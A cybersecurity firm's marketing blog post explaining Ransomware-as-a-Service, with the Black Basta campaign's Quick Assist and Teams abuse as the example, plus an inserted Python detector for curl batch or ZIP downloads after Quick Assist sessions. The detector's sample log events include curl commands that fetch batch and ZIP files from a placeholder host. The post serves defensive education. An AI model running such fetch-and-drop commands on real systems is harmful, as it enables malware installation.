Ransomware is one of those terms that people know they should fear, but they don’t always know why — until their computer files are locked, and a cybercriminal attaches a very expensive price tag to releasing the data.
It’s the stuff of nightmares for individuals, and now Ransomware-as-a-Service (RaaS) is a new twist on the old game that’s keeping business owners and IT professionals up at night, too.
What is Ransomware-as-a-Service?
Ransomware-as-a-Service (RaaS) rips off the Software-as-a-Service (SaaS) business model, giving ill-intentioned people with limited technical skills access to ready-made malware. Launching an attack no longer requires developing malware or having programming proficiency. Anyone can be a bad actor.
Of course, RaaS developers aren’t in the business of giving away their ransomware tools. Revenue streams typically follow one of four setups:
- A flat-fee monthly subscription
- An affiliate program that requires subscribers to share profits with developers
- A licensing fee that eliminates profit sharing
- Straight profit sharing
To sweeten the pot for paying would-be cybercriminals, RaaS providers commonly provide portals, Bitcoin pay options, support communities, and other benefits strikingly similar to what legitimate SaaS customers receive. On its face, everything appears on the up-and-up — until the ill intent is revealed.
Black Basta Demonstrates RaaS Pervasiveness
I find the ease of RaaS particularly troublesome. Attacks are more frequent, unpredictable, and specialized, and they can be incredibly sophisticated. RaaS affiliates who organize into groups to run targeted campaigns can be particularly insidious.
Earlier this year, one such ransomware affiliate group known as Black Basta launched a multi-pronged attack, using Microsoft’s Quick Assist as a point of entry. Black Basta’s approach centers on impersonating IT or help desk personnel through phishing scams, vishing (voice phishing), or frequent email delivery (email bomb attacks) to gain Quick Assist remote access to unsuspecting employees’ computers under the guise of needing to fix an issue.
Once they gain remote access, the Black Basta affiliates execute cURL scripts to download batch or ZIP files to infect systems with Qakbot, ScreenConnect, NetSupport Manager, and Cobalt Strike tools that ultimately help perpetuate the attack chain and malware deployment.
It turns out Black Basta isn’t stopping with Microsoft Quick Assist. Recent activity also shows the affiliates using Microsoft Teams to execute their attack in a similar fashion to their Quick Assist ploy. Credential theft through EvilProxy, batch scripts, and SystemBC deployment to maintain control of compromised systems follow, wreaking havoc within global enterprise systems that use these Microsoft tools.
Unfortunately, this example isn’t a random cautionary tale I made up to illustrate a point. It’s very real and speaks to the considerable risk RaaS introduces at the enterprise level. It also points to how businesses of any size are vulnerable in ways beyond the initial file lockout. Every minute spent dealing with an attack has costly consequences, including:
- Downtime and lost productivity
- Potential data breaches and compliance issues
- Damage to your reputation
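The Quick Assist chain described above leaves a recognizable trail in endpoint process logs. The Python below is an added example, not code from the original article: it flags curl.exe runs that fetch a batch or ZIP file shortly after Quick Assist starts on the same host. The event fields, the 30-minute window, and every sample event are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (normalised from a source such as
# Sysmon Event ID 1 or Security 4688); hosts, times and URLs are made up.
EVENTS = [
    {"host": "WS-014", "time": "2024-05-20T14:02:11", "image": r"C:\Windows\System32\quickassist.exe", "cmd": "quickassist.exe"},
    {"host": "WS-014", "time": "2024-05-20T14:09:40", "image": r"C:\Windows\System32\curl.exe", "cmd": r"curl.exe -o C:\Users\Public\fix.zip http://example.invalid/fix.zip"},
    {"host": "WS-014", "time": "2024-05-20T16:30:00", "image": r"C:\Windows\System32\curl.exe", "cmd": "curl.exe -s https://example.invalid/health"},
    {"host": "WS-022", "time": "2024-05-20T14:10:00", "image": r"C:\Windows\System32\curl.exe", "cmd": "curl.exe -o update.bat http://example.invalid/update.bat"},
    {"host": "WS-031", "time": "2024-05-20T09:00:00", "image": r"C:\Windows\System32\quickassist.exe", "cmd": "quickassist.exe"},
    {"host": "WS-031", "time": "2024-05-20T09:50:00", "image": r"C:\Windows\System32\curl.exe", "cmd": "curl.exe -o run.bat http://example.invalid/run.bat"},
]

# Batch (.bat/.cmd) or ZIP file referenced anywhere on the command line.
DOWNLOAD_RE = re.compile(r"\.(?:bat|cmd|zip)\b", re.IGNORECASE)


def basename(image):
    """Lower-cased executable name from a Windows or POSIX-style path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_suspicious_downloads(events, window_minutes=30):
    """Return (host, time, cmd) for curl batch/ZIP downloads that start
    within window_minutes of a Quick Assist launch on the same host."""
    window = timedelta(minutes=window_minutes)
    last_session = {}  # host -> time of the most recent Quick Assist start
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        name = basename(ev["image"])
        if name == "quickassist.exe":
            last_session[ev["host"]] = when
        elif name == "curl.exe" and DOWNLOAD_RE.search(ev["cmd"]):
            started = last_session.get(ev["host"])
            if started is not None and when - started <= window:
                hits.append((ev["host"], ev["time"], ev["cmd"]))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_downloads(EVENTS):
        print(hit)
```

A curl download with no preceding Quick Assist session (WS-022) is deliberately ignored here to keep noise down; widening the window trades more coverage for more false positives.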
The Best Defense is a Good Offense
The further RaaS allows bad actors to move away from traditional cyberattacks, the less effective some reactive cybersecurity measures become. That’s the bad news. The good news is that there are ways to effectively combat this level of cyber insecurity.
Control What You Can Control
Reviewing the steps you take to combat traditional ransomware attacks and strengthening best practices can be effective in warding off RaaS strikes:
- Create and enforce an incident response plan that formalizes the steps to take if an attack occurs
- Maintain a regular cadence of comprehensive backups, and keep backup systems stored offline (and offsite)
- Add or update firewalls, antivirus, intrusion detection systems, and other endpoint protections
- Invest in ongoing cybersecurity awareness training for all employees to increase knowledge of cyberattack schemes, and how to prevent them
Don’t Go It Alone
As cybercriminals and their attacks become more complex and pervasive, partnering with a provider with a track record of proven fully managed and co-managed technology services is a crucial investment.
Elevity is a trusted IT partner to customers in a range of industries. I can confidently say that the tools and expertise we offer are powerful solutions, and our commitment to customizing protections to your unique needs adds exceptional value and peace of mind.
Let’s explore how we can work together to keep RaaS bad actors from breaching your system. We offer a free cybersecurity risk assessment tool that asks key questions about important topics, such as security awareness, software, defenses against malware infection and more.
Click the link below to take the quick and convenient assessment, and we’ll be in touch with possible next steps on how you can ensure you’re as airtight on your cybersecurity as possible.